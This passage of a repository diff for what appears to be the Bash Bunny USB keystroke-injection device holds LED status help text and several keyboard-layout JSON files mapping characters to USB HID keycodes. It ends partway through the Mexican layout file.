Usage: LED [COLOR] [PATTERN] or LED [STATE]
|
||||
|
||||
COLORS
|
||||
------
|
||||
In addition to Red, Green and Blue, additive color mixing is possible.
|
||||
|
||||
-------- --------------------------------------------
|
||||
R Red
|
||||
G Green
|
||||
B Blue
|
||||
Y, R G Yellow (Commonly known as Amber)
|
||||
C, G B Cyan (Commonly known as Light Blue)
|
||||
M, R B Magenta (Commonly known as Violet or Purple)
|
||||
W, R G B White (Combination of R + G + B)
|
||||
|
||||
PATTERNS
|
||||
-------- --------------------------------------------------------
|
||||
SOLID *Default. No blink. Used if pattern argument is ommitted
|
||||
|
||||
SLOW Symmetric 1000ms ON, 1000ms OFF, repeating
|
||||
FAST Symmetric 100ms ON, 100ms OFF, repeating
|
||||
VERYFAST Symmetric 10ms ON, 10ms OFF, repeating
|
||||
|
||||
SINGLE 1 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
DOUBLE 2 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
TRIPLE 3 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
QUAD 4 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
QUIN 5 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
|
||||
ISINGLE 1 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IDOUBLE 2 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
ITRIPLE 3 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IQUAD 4 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IQUIN 5 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
|
||||
SUCCESS 1000ms VERYFAST blink followed by SOLID
|
||||
# Custom value in ms for continuous symmetric blinking
|
||||
|
||||
STATES
|
||||
---------------------------------------------------------------------
|
||||
In addition to the combinations of COLORS and PATTERNS listed above,
|
||||
these standardized LED STATES may be used to indicate payload status:
|
||||
|
||||
---------- ------------- ---------------------------------------------
|
||||
SETUP M SOLID Magenta solid
|
||||
|
||||
FAIL R SLOW Red slow blink
|
||||
FAIL1 R SLOW Red slow blink
|
||||
FAIL2 R FAST Red fast blink
|
||||
FAIL3 R VERYFAST Red very fast blink
|
||||
|
||||
ATTACK Y SINGLE Yellow single blink
|
||||
STAGE1 Y SINGLE Yellow single blink
|
||||
STAGE2 Y DOUBLE Yellow double blink
|
||||
STAGE3 Y TRIPLE Yellow triple blink
|
||||
STAGE4 Y QUAD Yellow quadruple blink
|
||||
STAGE5 Y QUIN Yellow quintuple blink
|
||||
|
||||
SPECIAL C ISINGLE Cyan inverted single blink
|
||||
SPECIAL1 C ISINGLE Cyan inverted single blink
|
||||
SPECIAL2 C IDOUBLE Cyan inverted double blink
|
||||
SPECIAL3 C ITRIPLE Cyan inverted triple blink
|
||||
SPECIAL4 C IQUAD Cyan inverted quadriple blink
|
||||
SPECIAL5 C IQUIN Cyan inverted quintuple blink
|
||||
|
||||
CLEANUP W FAST White fast blink
|
||||
FINISH G SUCCESS Green 1000ms VERYFAST blink followed by SOLID
|
||||
|
||||
OFF Turns the LED off
|
||||
|
||||
-----------------------------------------------------------------------------
|
||||
|
||||
(\___/) Find further documentation, repository of payloads, (\___/)
|
||||
(='.'=) tutorial videos and community support forums at (='.'=)
|
||||
(")_(") bashbunny.com. (C) Hak5 LLC (")_(")
|
||||
|
||||
170
languages/ca-fr.json
Normal file
170
languages/ca-fr.json
Normal file
@@ -0,0 +1,170 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"__comment":" Canadian french version made by Dominic Villeneuve",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"0":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"-":"00,00,2d",
|
||||
"=":"00,00,2e",
|
||||
"^":"00,00,2f",
|
||||
"<":"40,00,36",
|
||||
";":"00,00,33",
|
||||
"`":"40,00,2f",
|
||||
"#":"02,00,20",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,35",
|
||||
"/":"00,00,35",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"?":"02,00,23",
|
||||
"&":"02,00,24",
|
||||
"*":"02,00,25",
|
||||
"(":"02,00,26",
|
||||
")":"02,00,27",
|
||||
"_":"02,00,2d",
|
||||
"+":"02,00,2e",
|
||||
">":"40,00,37",
|
||||
":":"02,00,33",
|
||||
"|":"40,00,35",
|
||||
"'":"02,00,36",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"\\":"02,00,35",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"@":"02,00,1f",
|
||||
"[":"40,00,26",
|
||||
"]":"40,00,27",
|
||||
"}":"40,00,25",
|
||||
"~":"40,00,30",
|
||||
"{":"40,00,24",
|
||||
"COMMAND-CTRL-SHIFT":"40,00,34",
|
||||
"COMMAND-CTRL":"40,00,34",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,34"
|
||||
}
|
||||
169
languages/cz.json
Normal file
169
languages/cz.json
Normal file
@@ -0,0 +1,169 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":" Czech QWERTZ version made by Andrej Šimko",
|
||||
"__comment":" Note that some special characters use leftCtrl+leftAlt+[key]",
|
||||
"__comment":" Special Czech characters like ěščřžýáíéů are not included",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"z":"00,00,1c",
|
||||
"y":"00,00,1d",
|
||||
"+":"00,00,1e",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"=":"00,00,2d",
|
||||
")":"00,00,30",
|
||||
";":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Z":"02,00,1c",
|
||||
"Y":"02,00,1d",
|
||||
"1":"02,00,1e",
|
||||
"2":"02,00,1f",
|
||||
"3":"02,00,20",
|
||||
"4":"02,00,21",
|
||||
"5":"02,00,22",
|
||||
"6":"02,00,23",
|
||||
"7":"02,00,24",
|
||||
"8":"02,00,25",
|
||||
"9":"02,00,26",
|
||||
"0":"02,00,27",
|
||||
"\\":"05,00,14",
|
||||
"%":"02,00,2d",
|
||||
"/":"02,00,2f",
|
||||
"(":"02,00,30",
|
||||
"'":"02,00,31",
|
||||
"\"":"02,00,33",
|
||||
"!":"02,00,34",
|
||||
"?":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
"|":"05,00,1a",
|
||||
"#":"05,00,1b",
|
||||
"&":"05,00,06",
|
||||
"@":"05,00,19",
|
||||
"$":"05,00,33",
|
||||
"*":"05,00,38",
|
||||
"{":"05,00,05",
|
||||
"}":"05,00,11",
|
||||
"[":"05,00,09",
|
||||
"]":"05,00,0a",
|
||||
"~":"05,00,1e",
|
||||
"^":"05,00,20",
|
||||
"<":"05,00,36",
|
||||
">":"05,00,37",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
}
|
||||
14
languages/de.json
Normal file → Executable file
14
languages/de.json
Normal file → Executable file
@@ -17,6 +17,7 @@
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"__comment":"German umlauts added by Simon Dankelmann",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
@@ -165,5 +166,14 @@
|
||||
"|":"40,00,64",
|
||||
"COMMAND-CTRL-SHIFT":"40,00,64",
|
||||
"COMMAND-CTRL":"40,00,64",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64"
|
||||
}
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64",
|
||||
"ß":"00,00,2d",
|
||||
"€":"40,00,08",
|
||||
"§":"02,00,20",
|
||||
"ä":"00,00,34",
|
||||
"ö":"00,00,33",
|
||||
"ü":"00,00,2f",
|
||||
"Ä":"02,00,34",
|
||||
"Ö":"02,00,33",
|
||||
"Ü":"02,00,2f"
|
||||
}
|
||||
|
||||
@@ -139,6 +139,7 @@
|
||||
")":"02,00,26",
|
||||
"=":"02,00,27",
|
||||
"?":"02,00,2d",
|
||||
"^":"02,00,30",
|
||||
"*":"02,00,31",
|
||||
";":"02,00,36",
|
||||
":":"02,00,37",
|
||||
@@ -164,4 +165,4 @@
|
||||
"COMMAND-CTRL-SHIFT":"40,00,64",
|
||||
"COMMAND-CTRL":"40,00,64",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64"
|
||||
}
|
||||
}
|
||||
|
||||
176
languages/es-la.json
Normal file
176
languages/es-la.json
Normal file
@@ -0,0 +1,176 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"0":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"'":"00,00,2d",
|
||||
"¿":"00,00,2e",
|
||||
"´":"00,00,2f",
|
||||
"+":"00,00,30",
|
||||
"ñ":"00,00,31",
|
||||
"{":"00,00,33",
|
||||
"}":"00,00,34",
|
||||
"|":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"<":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"&":"02,00,23",
|
||||
"/":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
")":"02,00,27",
|
||||
"?":"02,00,2d",
|
||||
"¡":"02,00,2e",
|
||||
"¨":"02,00,2f",
|
||||
"*":"02,00,30",
|
||||
"Ñ":"02,00,31",
|
||||
"[":"02,00,33",
|
||||
"]":"02,00,34",
|
||||
"°":"02,00,35",
|
||||
";":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
">":"02,00,64",
|
||||
"\\":"04,00,2d",
|
||||
"~":"04,00,30",
|
||||
"^":"04,00,33",
|
||||
"`":"04,00,34",
|
||||
"¬":"04,00,35",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
}
|
||||
177
languages/mx.json
Normal file
177
languages/mx.json
Normal file
@@ -0,0 +1,177 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"0":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"'":"00,00,2d",
|
||||
"¿":"00,00,2e",
|
||||
"´":"00,00,2f",
|
||||
"+":"00,00,30",
|
||||
"}":"00,00,31",
|
||||
"ñ":"00,00,33",
|
||||
"{":"00,00,34",
|
||||
"|":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"<":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"&":"02,00,23",
|
||||
"/":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
"=":"02,00,27",
|
||||
"?":"02,00,2d",
|
||||
"¡":"02,00,2e",
|
||||
"¨":"02,00,2f",
|
||||
"*":"02,00,30",
|
||||
